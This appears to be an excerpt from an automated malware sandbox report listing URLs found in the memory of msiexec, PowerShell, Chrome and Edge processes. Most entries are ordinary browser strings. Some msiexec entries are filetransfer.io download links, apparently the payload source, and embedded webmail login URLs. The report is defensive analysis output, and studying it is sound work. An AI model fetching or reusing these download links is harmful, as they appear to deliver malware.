              Source: msiexec.exe, 00000004.00000003.144376861712.0000000005461000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148891816559.0000000005462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io/data-package/kpFdlS7h/download3
              Source: msiexec.exe, 00000004.00000003.144080071726.00000000054B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io/data-package/kpFdlS7h/downloadLax
              Source: msiexec.exe, 00000004.00000003.144376861712.0000000005461000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148891816559.0000000005462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io/data-package/kpFdlS7h/downloadm
              Source: chrome.exe, 00000008.00000002.144262805081.000012AC00E50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144263390938.000012AC00F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
              Source: chrome.exe, 00000008.00000002.144262805081.000012AC00E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=searchTerms
              Source: powershell.exe, 00000002.00000002.144019020175.0000000005018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.144019020175.0000000005018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
              Source: msedge.exe, 0000000F.00000002.144314485430.00006428000A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: chrome.exe, 00000008.00000003.144169246553.000012A800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/search
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
              Source: chrome.exe, 00000008.00000003.144169246553.000012A800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.comb
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
              Source: Reporting and NEL.20.drString found in binary or memory: https://identity.nel.measure.office.net/api/report?catId=GW
              Source: chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144206111077.000012AC00C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
              Source: chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144206111077.000012AC00C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/292285899
              Source: chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144206111077.000012AC00C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/349489248
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
              Source: msiexec.exe, 00000009.00000002.144190715637.0000000004D2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.144187932890.0000000004D2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.144189871263.0000000002E8F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
              Source: msiexec.exe, 00000009.00000002.144189871263.0000000002E8F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/$E
              Source: msiexec.exe, 00000009.00000002.144190715637.0000000004D2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.144187932890.0000000004D2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
              Source: msiexec.exe, 00000009.00000002.144190715637.0000000004D2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.144187932890.0000000004D2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
              Source: Tabs_13375782673925510.17.drString found in binary or memory: https://login.microsoftonline.com
              Source: Tabs_13375782673925510.17.drString found in binary or memory: https://login.microsoftonline.com/
              Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
              Source: chrome.exe, 00000008.00000003.144169246553.000012A800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/u/0/?check_pwa_migration_eligible=123
              Source: chrome.exe, 00000008.00000002.144263481982.000012AC00F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144260631416.000012AC009A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/
              Source: chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
              Source: chrome.exe, 00000008.00000002.144263481982.000012AC00F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144260631416.000012AC009A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144262805081.000012AC00E50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144265218991.000012AC01304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
              Source: chrome.exe, 00000008.00000002.144265403166.000012AC01398000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
              Source: chrome.exe, 00000008.00000002.144264156374.000012AC01094000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144260879436.000012AC00A44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258729862.000012AC00640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144262325708.000012AC00D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144263261282.000012AC00F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
              Source: chrome.exe, 00000008.00000002.144263261282.000012AC00F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_defaulter7
              Source: msedge.exe, 0000000F.00000002.144314485430.00006428000A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
              Source: msedge.exe, 0000000F.00000002.144314485430.00006428000A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myshop.amplify.com/cart
              Source: 000003.log5.17.drString found in binary or memory: https://ntp.msn.com
              Source: 000003.log4.17.drString found in binary or memory: https://ntp.msn.com/
              Source: Session_13375782673696843.17.dr, Favicons.17.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNH
              Source: powershell.exe, 00000002.00000002.144023424474.0000000005F29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
              Source: chrome.exe, 00000008.00000002.144257213377.000012AC00350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
              Source: powershell.exe, 00000002.00000002.144017518011.000000000303E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144118475021.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144079911503.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144080071726.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377552368.00000000054A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
              Source: msiexec.exe, 00000009.00000003.144189148646.000000000331A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://passwords.google/
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poshmark.com/bundles/shop
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
              Source: msiexec.exe, 00000004.00000003.144118475021.00000000054E8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377552368.00000000054E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s20.filetransfer.io//
              Source: msiexec.exe, 00000004.00000003.144080071726.00000000054E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s20.filetransfer.io/My
              Source: msiexec.exe, 00000004.00000003.144118475021.00000000054E8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377552368.00000000054E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s20.filetransfer.io/W
              Source: msiexec.exe, 00000004.00000003.144079911503.00000000054E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s20.filetransfer.io/storage/download/DSOnK3w83O1d
              Source: msiexec.exe, 00000004.00000003.144376861712.0000000005461000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148891816559.0000000005462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s20.filetransfer.io/storage/download/DSOnK3w83O1dD
              Source: chrome.exe, 00000008.00000002.144256128104.000012AC00120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144257598930.000012AC003E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
              Source: chrome.exe, 00000008.00000002.144255805494.000012AC000B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure-oldnavy.gap.com/shopping-bag
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.newegg.com/shop/cart
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shop.advanceautoparts.com/web/OrderItemDisplay
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shop.lululemon.com/shop/mybag
              Source: chrome.exe, 00000008.00000002.144255665782.000012AC000AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: chrome.exe, 00000008.00000003.144169246553.000012A800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.google.com/product/nest_hello_doorbell2
              Source: chrome.exe, 00000008.00000003.144169246553.000012A800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.google.com/product/nest_mini
              Source: chrome.exe, 00000008.00000003.144169246553.000012A800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.google.com/product/nest_thermostat
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/cart/
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.usps.com/store/cart/cart.jsp
              Source: msedge.exe, 0000000F.00000002.144316834802.0000642800460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
              Source: msedge.exe, 0000000F.00000002.144316834802.0000642800460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
              Source: chrome.exe, 00000008.00000002.144260879436.000012AC00A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
              Source: chrome.exe, 00000008.00000002.144262848392.000012AC00E64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144208274532.000012AC00E90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.ico
              Source: Web Data.17.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
              Source: chrome.exe, 00000008.00000002.144261885134.000012AC00CC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/search
              Source: chrome.exe, 00000008.00000002.144261885134.000012AC00CC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/search?ei=&fr=crmas&p=
              Source: chrome.exe, 00000008.00000002.144261885134.000012AC00CC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
              Source: chrome.exe, 00000008.00000002.144263189888.000012AC00F20000.00000004.00000800.00020000.00000000.sdmp, Web Data.17.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: msedge.exe, 0000000F.00000003.144303473816.0000014B7A89D000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144307376820.0000014B7A89D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us
              Source: msedge.exe, 0000000F.00000002.144308375290.0000014B7C700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us-1001
              Source: msedge.exe, 0000000F.00000003.144303473816.0000014B7A89D000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144307376820.0000014B7A89D000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144308375290.0000014B7C700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us
              Source: msedge.exe, 0000000F.00000002.144308375290.0000014B7C700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us-1001
              Source: msedge.exe, 0000000F.00000003.144303473816.0000014B7A89D000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144307376820.0000014B7A89D000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144308375290.0000014B7C700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.abebooks.com/servlet/ShopBasketPL
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.academy.com/shop/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.acehardware.com/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.adorama.com/als.mvc/cartview
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ae.com/us/en/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.altardstate.com/cart/
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/gp/cart/view.html
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/gp/cart/view.html
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.anthropologie.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.apple.com/shop/bag
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.atlassian.com/purchase/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.att.com/buy/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.backcountry.com/Store/cart/cart.jsp
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.basspro.com/shop/AjaxOrderItemDisplayView
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bathandbodyworks.com/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bedbathandbeyond.com/store/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.belk.com/shopping-bag/
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bhphotovideo.com/find/cart.jsp
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bloomingdales.com/my-bag
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.boostmobile.com/cart.html
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bricklink.com/v2/globalcart.page
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.brownells.com/aspx/store/cart.aspx
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.buybuybaby.com/store/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.carid.com/cart.php
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.chegg.com/shoppingcart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.containerstore.com/cart/list.htm
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.costco.com/CheckoutCartDisplayView
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.crateandbarrel.com/Checkout/Cart
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dickssportinggoods.com/OrderItemDisplay
              Source: chrome.exe, 00000008.00000002.144258258607.000012AC00510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dillards.com/webapp/wcs/stores/servlet/OrderItemDisplay
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dsw.com/en/us/shopping-bag
              Source: chrome.exe, 00000008.00000002.144262848392.000012AC00E64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144208274532.000012AC00E90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: chrome.exe, 00000008.00000002.144262325708.000012AC00D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144263261282.000012AC00F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
              Source: chrome.exe, 00000008.00000002.144262325708.000012AC00D8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
              Source: chrome.exe, 00000008.00000002.144262325708.000012AC00D8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.electronicexpress.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.etsy.com/cart/
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eyebuydirect.com/cart
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fingerhut.com/cart/index
              Source: chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.finishline.com/store/cart/cart.jsp
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.freepeople.com/cart/
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gamestop.com/cart/
              Source: chrome.exe, 00000008.00000002.144255665782.000012AC000AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: chrome.exe, 00000008.00000002.144255665782.000012AC000AA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258051957.000012AC0046C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 0000000B.00000002.144171198666.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: chrome.exe, 00000008.00000002.144256031394.000012AC000F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144260344426.000012AC0092C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/#safe
              Source: chrome.exe, 00000008.00000002.144261607698.000012AC00C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/browser-features/
              Source: chrome.exe, 00000008.00000002.144261607698.000012AC00C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/browser-tools/
              Source: chrome.exe, 00000008.00000002.144259830065.000012AC00820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144262325708.000012AC00D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144263261282.000012AC00F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
              Source: Web Data.17.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
              Source: chrome.exe, 00000008.00000002.144258684191.000012AC00630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
              Source: chrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
              Source: chrome.exe, 00000008.00000002.144255665782.000012AC000AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.groupon.com/cart
              Source: chrome.exe, 00000008.00000002.144255665782.000012AC000AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
